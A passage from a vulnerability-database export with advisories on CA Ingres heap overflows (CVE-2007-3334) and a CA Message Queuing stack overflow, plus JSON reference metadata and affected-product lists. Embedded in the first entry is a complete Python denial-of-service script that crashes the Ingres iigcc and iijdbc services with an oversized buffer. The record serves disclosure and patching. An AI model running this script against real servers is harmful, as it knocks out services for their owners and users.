http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. Ingres Database Multiple Heap Corruption Vulnerabilities\n\niDefense Security Advisory 06.21.07\nhttp://labs.idefense.com/intelligence/vulnerabilities/\nJun 21, 2007\n\nI. BACKGROUND\n\nIngres is the database backend used by default in several CA products. \nThe SCM (Secure Content Manager) is one of the products that uses\nIngres. The SCM use Ingres to store quarantined virii and blocked HTTP\nrequests/replies. For more information visit the following URLs. \n\nhttp://www3.ca.com/solutions/Product.aspx?ID=1013\n\nhttp://www.ingres.com/\n\nII. The Communications\nServer is the main component responsible for receiving and handling\nrequests from the network. The Data Access Server is responsible for\nhandling requests from the Ingres JDBC Driver and .NET data providers. \nThese requests are decoded into Ingres internal formats and passed on\nto other components of the database server. \n\nThe application does not properly validate the length of attacker\nsupplied data before copying it into a fixed size heap buffer. This\nleads to an exploitable condition. \n\nIII. ANALYSIS\n\nExploitation allows an unauthenticated attacker to execute arbitrary\ncode with SYSTEM privileges. \n\nIn order to exploit this vulnerability an attacker would have to send a\nmalformed request to the database server. This requires the ability to\nestablish a TCP session on port 10916 (iigcc) or 10923 (iigcd). \n\nExploitation has been demonstrated to be trivial. \n\nIV. Previous versions may also be affected. In addition, any\napplication that uses the Ingres Database may be vulnerable. \n\nV. WORKAROUND\n\nEmploying firewalls or other access control methods can effectively\nreduce exposure to this vulnerability. \n\nVI. VENDOR RESPONSE\n\nCA has made fixes available for all supported CA products that embed\nIngres. For more information consult CA\u0027s Security Alert at the\nfollowing URL. \n\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CVE-2007-3334 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org/), which standardizes names for\nsecurity problems. \n\nVIII. DISCLOSURE TIMELINE\n\n01/16/2007 Initial vendor notification\n01/17/2007 Initial vendor response\n06/21/2007 Coordinated public disclosure\n\nIX. CREDIT\n\nThe discoverer of this vulnerability wishes to remain anonymous. \n\nGet paid for vulnerability research\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com/\n\nX. LEGAL NOTICES\n\nCopyright \\xa9 2007 iDefense, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDefense. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically,\nplease e-mail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \n There are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct,\nindirect, or consequential loss or damage arising from use of, or\nreliance on, this information. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities\n# Date: 2010-08-14\n# Author: fdisk\n# Version: 2.6\n# Tested on: Windows 2003 Server SP1 en\n# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338\n# Notes: Fixed in the last version. \n# please let me know if you are/were able to get code execution \u003crr dot fdisk at gmail dot com\u003e\n \nimport socket\nimport sys\n \nif len(sys.argv) != 4:\n print \"Usage: ./CAAdvantageDoS.py \u003cTarget IP\u003e \u003cPort\u003e \u003cService\u003e\"\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \nhost = sys.argv[1]\nport = int(sys.argv[2])\nservice = sys.argv[3]\n \nif service == \"iigcc\":\n payload = \"\\x41\" * 2106\nelif service == \"iijdbc\":\n payload = \"\\x41\" * 1066\nelse:\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \npayload += \"\\x42\" * 4\n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\nprint \"Sending payload\"\ns.send(payload)\ndata = s.recv(1024)\ns.close()\nprint \u0027Received\u0027, repr(data)\n \nprint service + \" crashed\"\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3334"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "BID",
"id": "24585"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-3334",
"trust": 3.0
},
{
"db": "BID",
"id": "24585",
"trust": 1.9
},
{
"db": "VUPEN",
"id": "ADV-2007-2288",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2290",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25756",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25775",
"trust": 1.6
},
{
"db": "SECTRACK",
"id": "1018278",
"trust": 1.6
},
{
"db": "OSVDB",
"id": "37488",
"trust": 1.0
},
{
"db": "OSVDB",
"id": "37487",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222",
"trust": 0.8
},
{
"db": "XF",
"id": "35002",
"trust": 0.6
},
{
"db": "XF",
"id": "34992",
"trust": 0.6
},
{
"db": "XF",
"id": "34991",
"trust": 0.6
},
{
"db": "IDEFENSE",
"id": "20070621 INGRES DATABASE MULTIPLE HEAP CORRUPTION VULNERABILITIES",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "57303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "57276",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92818",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
]
},
"id": "VAR-200706-0395",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.12878788
},
"last_update_date": "2023-12-18T12:46:47.324000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.actian.com/products/ingres"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://windows.microsoft.com/en-us/windows/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"trust": 2.0,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"trust": 2.0,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25756"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25775"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/24585"
},
{
"trust": 1.6,
"url": "http://www.securitytracker.com/id?1018278"
},
{
"trust": 1.0,
"url": "http://osvdb.org/37487"
},
{
"trust": 1.0,
"url": "http://osvdb.org/37488"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34991"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34992"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35002"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3334"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-3334"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/35002"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/34992"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/34991"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2290"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2288"
},
{
"trust": 0.4,
"url": "http://www.ingres.com/"
},
{
"trust": 0.3,
"url": "/archive/1/472192"
},
{
"trust": 0.3,
"url": "/archive/1/471950"
},
{
"trust": 0.3,
"url": "/archive/1/472197"
},
{
"trust": 0.3,
"url": "/archive/1/472193"
},
{
"trust": 0.3,
"url": "/archive/1/472194"
},
{
"trust": 0.3,
"url": "/archive/1/472200"
},
{
"trust": 0.3,
"url": "msg://bugtraq/649cdcb56c88aa458eff2cbf494b6204030a79ca@usilms12.ca.com"
},
{
"trust": 0.3,
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3334"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3336"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3337"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3336"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3337"
},
{
"trust": 0.1,
"url": "http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:415738+htmpl=kt_document_view.htmpl"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://www.ngssoftware.com/research/advisories/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/solutions/product.aspx?id=1013"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/),"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/methodology/vulnerability/vcp.php"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-06-21T00:00:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"date": "2007-06-26T21:32:27",
"db": "PACKETSTORM",
"id": "57303"
},
{
"date": "2007-06-26T20:06:58",
"db": "PACKETSTORM",
"id": "57276"
},
{
"date": "2010-08-17T01:35:50",
"db": "PACKETSTORM",
"id": "92818"
},
{
"date": "2007-06-21T22:30:00",
"db": "NVD",
"id": "CVE-2007-3334"
},
{
"date": "2007-06-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-19T08:36:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"date": "2017-07-29T01:32:10.940000",
"db": "NVD",
"id": "CVE-2007-3334"
},
{
"date": "2007-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "eTrust Secure Content Manager including CA Used in products Ingres Database Server For Communications Server Heap-based buffer overflow vulnerability in components",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
],
"trust": 0.6
}
}
VAR-200707-0544
Vulnerability from variot - Updated: 2023-12-18 12:46Stack-based buffer overflow in the Message Queuing Server (Cam.exe) in CA (formerly Computer Associates) Message Queuing (CAM / CAFT) software before 1.11 Build 54_4 on Windows and NetWare, as used in CA Advantage Data Transport, eTrust Admin, certain BrightStor products, certain CleverPath products, and certain Unicenter products, allows remote attackers to execute arbitrary code via a crafted message to TCP port 3104. Multiple Computer Associates products are prone to a remote stack-based buffer-overflow vulnerability. This issue affects the Message Queuing (CAM/CAFT) component. The application fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. A successful exploit will allow an attacker to execute arbitrary code with SYSTEM-level privileges. There is a buffer overflow vulnerability in the CAM service when processing malformed user requests. Remote attackers may use this vulnerability to control the server.
Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now available: http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. Please see the vendor's advisory for more details.
CAM (Windows): http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO89945
CAM(Netware): http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO89943
PROVIDED AND/OR DISCOVERED BY: IBM ISS X-Force
ORIGINAL ADVISORY: CA: http://supportconnectw.ca.com/public/dto_transportit/infodocs/camsgquevul-secnot.asp
IBM ISS X-Force: http://www.iss.net/threats/272.html
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
.
Mitigating Factors: None
Severity: CA has given this vulnerability a High risk rating.
i.e. CAM versions 1.04, 1.05, 1.06, 1.07, 1.10 (prior to Build
54_4) and 1.11 (prior to Build 54_4).
Affected Products: Advantage Data Transport 3.0 BrightStor SAN Manager 11.1, 11.5 BrightStor Portal 11.1 CleverPath OLAP 5.1 CleverPath ECM 3.5 CleverPath Predictive Analysis Server 2.0, 3.0 CleverPath Aion 10.0 eTrust Admin 2.01, 2.04, 2.07, 2.09, 8.0, 8.1 Unicenter Application Performance Monitor 3.0, 3.5 Unicenter Asset Management 3.1, 3.2, 3.2 SP1, 3.2 SP2, 4.0, 4.0 SP1 Unicenter Data Transport Option 2.0 Unicenter Enterprise Job Manager 1.0 SP1, 1.0 SP2 Unicenter Jasmine 3.0 Unicenter Management for WebSphere MQ 3.5 Unicenter Management for Microsoft Exchange 4.0, 4.1 Unicenter Management for Lotus Notes/Domino 4.0 Unicenter Management for Web Servers 5, 5.0.1 Unicenter NSM 3.0, 3.1 Unicenter NSM Wireless Network Management Option 3.0 Unicenter Remote Control 6.0, 6.0 SP1 Unicenter Service Level Management 3.0, 3.0.1, 3.0.2, 3.5 Unicenter Software Delivery 3.0, 3.1, 3.1 SP1, 3.1 SP2, 4.0, 4.0 SP1 Unicenter TNG 2.1, 2.2, 2.4, 2.4.2 Unicenter TNG JPN 2.2
Affected Platforms: Windows and NetWare
Platforms NOT affected: AIX, AS/400, DG Intel, DG Motorola, DYNIX, HP-UX, IRIX, Linux Intel, Linux s/390, MVS, Open VMS, OS/2, OSF1, Solaris Intel, Solaris Sparc and UnixWare.
Status and Recommendation:
CA has made patches available for all affected products. These
patches are independent of the CA Software that installed CAM.
Simply select the patch appropriate to the platform, and the
installed version of CAM, and follow the patch application
instructions. You should also review the product home pages on
SupportConnect for any additional product specific instructions.
Solutions for CAM: Platform Solution Windows QO89945 NetWare QO89943
How to determine if you are affected:
Determining CAM versions: Simply running camstat will return the version information in the top line of the output on any platform. The camstat command is located in the bin subfolder of the installation directory.
The example below indicates that CAM version 1.11 build 27 increment 2 is running.
E:>camstat CAM – machine.ca.com Version 1.11 (Build 27_2) up 0 days 1:16
Determining the CAM install directory:
Windows: The install location is specified by the %CAI_MSQ% environment variable. Unix/Linux/Mac: The /etc/catngcampath text file holds the CAM install location.
Workaround: The affected listening port can be disabled by creating or updating CAM's configuration file, CAM.CFG, with the following entry under the "*CONFIG" section:
*CONFIG cas_port=0
The CA Messaging Server must be recycled in order for this to take effect. We advise that products dependent upon CAM should be shutdown prior to recycling CAM. Once dependent products have been shutdown, CAM can be recycled with the following commands:
On Windows: camclose cam start
On NetWare: load camclose load cam start
Once CAM has been restarted, any CAM dependent products that were shutdown can be restarted.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFGpqCHeSWR3+KUGYURAt6DAJ0YpnaiwrNfhhQlvdvL28LYxBYbZgCfRpKQ pNdOPBvd1/BVRF6Lo65uo2o= =7w0f -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200707-0544",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "2.2"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "4.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.7"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.2"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.1"
},
{
"model": "cleverpath olap",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "5.1"
},
{
"model": "unicenter application performance monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter remote control",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "cleverpath aion",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "10.0"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter data transport option",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.4"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.1"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "5.0"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "advantage data transport",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "cleverpath predictive analysis server",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.1"
},
{
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.5"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0.2"
},
{
"model": "unicenter enterprise job manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "unicenter application performance monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter nsm wireless network management option",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "brightstor portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4.2"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.2"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.9"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "5.0.1"
},
{
"model": "cleverpath predictive analysis server",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "cleverpath ecm",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "unicenter jasmine",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "brightstor portal",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "brightstor san manager",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "advantage data transport",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "cleverpath aion",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "cleverpath ecm",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "cleverpath olap",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "cleverpath predictive analysis server",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust admin",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter application performance monitor",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter asset management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter data transport option",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter enterprise job manager",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter jasmine",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
